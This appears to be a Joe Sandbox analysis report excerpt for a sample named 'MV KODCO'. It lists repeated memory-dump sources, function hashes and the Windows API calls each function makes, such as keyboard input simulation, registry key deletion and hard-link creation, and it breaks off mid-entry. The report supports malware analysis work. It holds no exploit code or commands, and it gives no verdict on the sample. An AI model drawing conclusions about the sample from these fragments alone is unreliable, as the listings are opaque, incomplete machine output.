                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                          • API String ID: 2574300362-1071820185
                                                          • Opcode ID: fa8e6f976acee0eb62e52feb11939276e114efbf897aa59410e4658cbdffc8b5
                                                          • Instruction ID: 052bc66740293ce65adc1c8bb57c6e7c623efda7cce6197981f4804402d9124c
                                                          • Opcode Fuzzy Hash: fa8e6f976acee0eb62e52feb11939276e114efbf897aa59410e4658cbdffc8b5
                                                          • Instruction Fuzzy Hash: 53D0C775944B23AFDB209F65F818641B6EAAB15711B11D41DE456E2651D6F0C8808E50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0063ECBE,?,0063EBBB), ref: 0063ECD6
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0063ECE8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: 56fcdfd8b4ad8f3fd4fa2108ca03923de5d7502862858aaf2f05c42e7533cde1
                                                          • Instruction ID: 441ce31740051b92c00f263c2b00c535f5b2c0e79d72de327634ce50e8d76d82
                                                          • Opcode Fuzzy Hash: 56fcdfd8b4ad8f3fd4fa2108ca03923de5d7502862858aaf2f05c42e7533cde1
                                                          • Instruction Fuzzy Hash: D2D0A770900723AFCF205F61E848646B6EAAB01700F019419F855D2690DFF4C8818760
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0063BAD3,00000001,0063B6EE,?,0067DC00), ref: 0063BAEB
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0063BAFD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: f8a70e19a9ca6f4f3acccd8877dab9d2b6513590707753a7d0107dcdc97c3612
                                                          • Instruction ID: ae57887915c64d6843b5496e6baceb4093f3844381f421b92aeb89bb0b6d23be
                                                          • Opcode Fuzzy Hash: f8a70e19a9ca6f4f3acccd8877dab9d2b6513590707753a7d0107dcdc97c3612
                                                          • Instruction Fuzzy Hash: 1BD0A770D00713AFCB305F21E848B51F6DAAB01300F015419E943D2654DFF0C880C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00643BD1,?,00643E06), ref: 00643BE9
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00643BFB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 62fed89d11a40de13e75b7f8a3caa1ff330ecb0028150b25d73c3442bed3ed64
                                                          • Instruction ID: 2c3414fd2967a4b79687f5ab06545d24369ca87e0bbce03e9130ab2bc881fc73
                                                          • Opcode Fuzzy Hash: 62fed89d11a40de13e75b7f8a3caa1ff330ecb0028150b25d73c3442bed3ed64
                                                          • Instruction Fuzzy Hash: 05D0C7F09007629FDB205FA5E858A43FAFEAF07725B215419E455E2751DAF0D4818E50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5ffc3478b507c36532daae9f8050c4cf43af28966b737c24ca2fcbc644c5427
                                                          • Instruction ID: a9819729e3b68f3bc370c35e96f68a50cfbfd018276154612e01971542640a27
                                                          • Opcode Fuzzy Hash: b5ffc3478b507c36532daae9f8050c4cf43af28966b737c24ca2fcbc644c5427
                                                          • Instruction Fuzzy Hash: 1FC13D75A0021AEFCB14DFA4C894AEEB7B6FF48704F184598E945EB251D730DE81DBA0
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 0063AAB4
                                                          • CoUninitialize.OLE32 ref: 0063AABF
                                                            • Part of subcall function 00620213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0062027B
                                                          • VariantInit.OLEAUT32(?), ref: 0063AACA
                                                          • VariantClear.OLEAUT32(?), ref: 0063AD9D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
                                                          • Opcode ID: 1a980b2fe0475f62313a6ff79d1951afb50826d3e876a242c5c59b51a83e297b
                                                          • Instruction ID: f46a7354fc4116fdfe2db4a83c2ca7890687b0d1374827a4240deb82b0a8f61c
                                                          • Opcode Fuzzy Hash: 1a980b2fe0475f62313a6ff79d1951afb50826d3e876a242c5c59b51a83e297b
                                                          • Instruction Fuzzy Hash: 38A16A352047429FCB14EF55C495B6ABBE6BF88710F04484DFA969B3A2CB30ED01DB86
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Variant$AllocClearCopyInitString
                                                          • String ID:
                                                          • API String ID: 2808897238-0
                                                          • Opcode ID: 5b144affaf41f1d39c29bea604eb01443c6520e0aa97fa705191aa6b2a5a843f
                                                          • Instruction ID: 9a698a4a98932b870ac3dbe1190d3f18b7ad39c119e9f67b0775a88a20dd06fa
                                                          • Opcode Fuzzy Hash: 5b144affaf41f1d39c29bea604eb01443c6520e0aa97fa705191aa6b2a5a843f
                                                          • Instruction Fuzzy Hash: 7251E530A003069BDB249F76D4A5AEEB7E7EF44304F28881FE566CB2D1DB7098C19725
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                          • String ID:
                                                          • API String ID: 3877424927-0
                                                          • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                          • Instruction ID: bb7d4273515d2b878eed0f5e29e9c8019a6eebb16ec1514c80008418e697f40e
                                                          • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                          • Instruction Fuzzy Hash: 4351C7B0A40325ABDB2C8F69C8846AF77ABEF41321F24872DF825863D0D7719F518B44
                                                          APIs
                                                          • GetWindowRect.USER32(00E379B0,?), ref: 0064C544
                                                          • ScreenToClient.USER32(?,00000002), ref: 0064C574
                                                          • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 0064C5DA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientMoveRectScreen
                                                          • String ID:
                                                          • API String ID: 3880355969-0
                                                          • Opcode ID: e00243a9576c754b9bf33bc5c523b0183cb3bd7f657bf548c761d9498402f952
                                                          • Instruction ID: c705d6320e8c6e01ae3d07547fe15029e13c60666ee077793bffe47fc6da1802
                                                          • Opcode Fuzzy Hash: e00243a9576c754b9bf33bc5c523b0183cb3bd7f657bf548c761d9498402f952
                                                          • Instruction Fuzzy Hash: E2515971A01208EFCF64DF68C880AAE7BB6EB45320F209259F965DB390D770ED51CB90
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0061C462
                                                          • __itow.LIBCMT ref: 0061C49C
                                                            • Part of subcall function 0061C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0061C753
                                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0061C505
                                                          • __itow.LIBCMT ref: 0061C55A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$__itow
                                                          • String ID:
                                                          • API String ID: 3379773720-0
                                                          • Opcode ID: f8be8b10443a7e25e271e8a2646edc4cb498d0553e7e9c14a5530f532637f09e
                                                          • Instruction ID: 06309c35deba6d63c35a0fbbcce8cbeea399c614144a0129f81538824c417f8e
                                                          • Opcode Fuzzy Hash: f8be8b10443a7e25e271e8a2646edc4cb498d0553e7e9c14a5530f532637f09e
                                                          • Instruction Fuzzy Hash: DA411771A40249AFDF19DF58CC55FEE7FBAAF88310F040019FA45A7281DB709A85CBA1
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00623966
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00623982
                                                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 006239EF
                                                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00623A4D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 8f33142440a729471e5d093330cfe737891b905adaf0e34b32461d280a653fbe
                                                          • Instruction ID: da5978af260ffeb63766f56d41fda1481379104fb7d684310d192a417472f406
                                                          • Opcode Fuzzy Hash: 8f33142440a729471e5d093330cfe737891b905adaf0e34b32461d280a653fbe
                                                          • Instruction Fuzzy Hash: 7B410670E04A78AAEF208B64A8057FDBBB7AB56310F04015AF4C1963C1D7BD8AC5DF65
                                                          APIs
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0062E742
                                                          • GetLastError.KERNEL32(?,00000000), ref: 0062E768
                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0062E78D
                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0062E7B9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 01d105b9c05ed876b59adeb14e8b2421f5a03dd833626281dcee2984f36193cd
                                                          • Instruction ID: a6143678564a82facd06ec80fff84d87dbb6d9c9ca9a3b68758d82e8e729551c
                                                          • Opcode Fuzzy Hash: 01d105b9c05ed876b59adeb14e8b2421f5a03dd833626281dcee2984f36193cd
                                                          • Instruction Fuzzy Hash: 0D414539600A51DFCB15EF16C448A5DBBE6BF89710B098498E946AB3A2CB74FD00CF91
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0064B5D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 9591d79447a25765e6bfb90c8871ceffbdf138b4d2c78f5f8cb8b6e8b034c58d
                                                          • Instruction ID: 1717372c0297dc7029a08466fca700e196791b1eda17c356d3eae7cb5848016c
                                                          • Opcode Fuzzy Hash: 9591d79447a25765e6bfb90c8871ceffbdf138b4d2c78f5f8cb8b6e8b034c58d
                                                          • Instruction Fuzzy Hash: B131F074A01208BFEF28AF18CC89FECBB67EB06350F65A101FA55D62E1C770E9409B55
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 0064D807
                                                          • GetWindowRect.USER32(?,?), ref: 0064D87D
                                                          • PtInRect.USER32(?,?,0064ED5A), ref: 0064D88D
                                                          • MessageBeep.USER32(00000000), ref: 0064D8FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 28a1a56e247f9ff1c6bf0bea499706b7a3ae101ae9d0eb207935cd7910a5c3c0
                                                          • Instruction ID: bdc3d991688c9bd9afec8991dc03b9e6171f76d73d42f24a3637186d2e4a1b15
                                                          • Opcode Fuzzy Hash: 28a1a56e247f9ff1c6bf0bea499706b7a3ae101ae9d0eb207935cd7910a5c3c0
                                                          • Instruction Fuzzy Hash: 8F415774E00219EFCB11DF59D884AA9BBB7BB4A750F1882A9E815DB261D730E945CF40
                                                          APIs
                                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00623AB8
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00623AD4
                                                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00623B34
                                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00623B92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: c3e34f616595639670118d783d0906d58fbee7ccd7e7bd7d926a49310bc9b772
                                                          • Instruction ID: 6aaf5bdecda2a839f08227afc65231cfeac15ef6dccd3b150be27c12e7df0605
                                                          • Opcode Fuzzy Hash: c3e34f616595639670118d783d0906d58fbee7ccd7e7bd7d926a49310bc9b772
                                                          • Instruction Fuzzy Hash: 48310630A00A78AEEF208F64E8197FD7BA79B65312F04015AE481933D1C77C8B85DF65
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00614038
                                                          • __isleadbyte_l.LIBCMT ref: 00614066
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00614094
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006140CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: 6cf00092d47c6a5a7fa12d145d8d0e2763a0008e834fbe3b8f992813ea078cf4
                                                          • Instruction ID: 51ef9e5e8b788a55e1ccd90b08f591c0df03578f803b462b09b74f7c01ad439b
                                                          • Opcode Fuzzy Hash: 6cf00092d47c6a5a7fa12d145d8d0e2763a0008e834fbe3b8f992813ea078cf4
                                                          • Instruction Fuzzy Hash: 4631B431600206AFDB219F76C844BEA7BA7BF45312F194428E6559B2A1DB31D8D1D790
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 00647CB9
                                                            • Part of subcall function 00625F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00625F6F
                                                            • Part of subcall function 00625F55: GetCurrentThreadId.KERNEL32 ref: 00625F76
                                                            • Part of subcall function 00625F55: AttachThreadInput.USER32(00000000,?,0062781F), ref: 00625F7D
                                                          • GetCaretPos.USER32(?), ref: 00647CCA
                                                          • ClientToScreen.USER32(00000000,?), ref: 00647D03
                                                          • GetForegroundWindow.USER32 ref: 00647D09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: a17b962214549248eb84b78e38ed0a098b1525fccbc3957ff2c6bcbe749c2a77
                                                          • Instruction ID: 02b5559ad18d70a335ca6a47e5ec7b64756e08bd1adbc3d4956175ee29b87186
                                                          • Opcode Fuzzy Hash: a17b962214549248eb84b78e38ed0a098b1525fccbc3957ff2c6bcbe749c2a77
                                                          • Instruction Fuzzy Hash: 24313EB1D00108AFCB10EFA5D9859FFBBF9EF94310F11846AE915E3211DA749E058FA0
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • GetCursorPos.USER32(?), ref: 0064F211
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0065E4C0,?,?,?,?,?), ref: 0064F226
                                                          • GetCursorPos.USER32(?), ref: 0064F270
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0065E4C0,?,?,?), ref: 0064F2A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 63252059b1cb409f77e4afdb61ed1098313c3f061a53e9f8426610a14e0b0b3b
                                                          • Instruction ID: 5cb0addd57510ae42a582411bfe9a9062561f61a1d4629d99f21c1daf0e6c77d
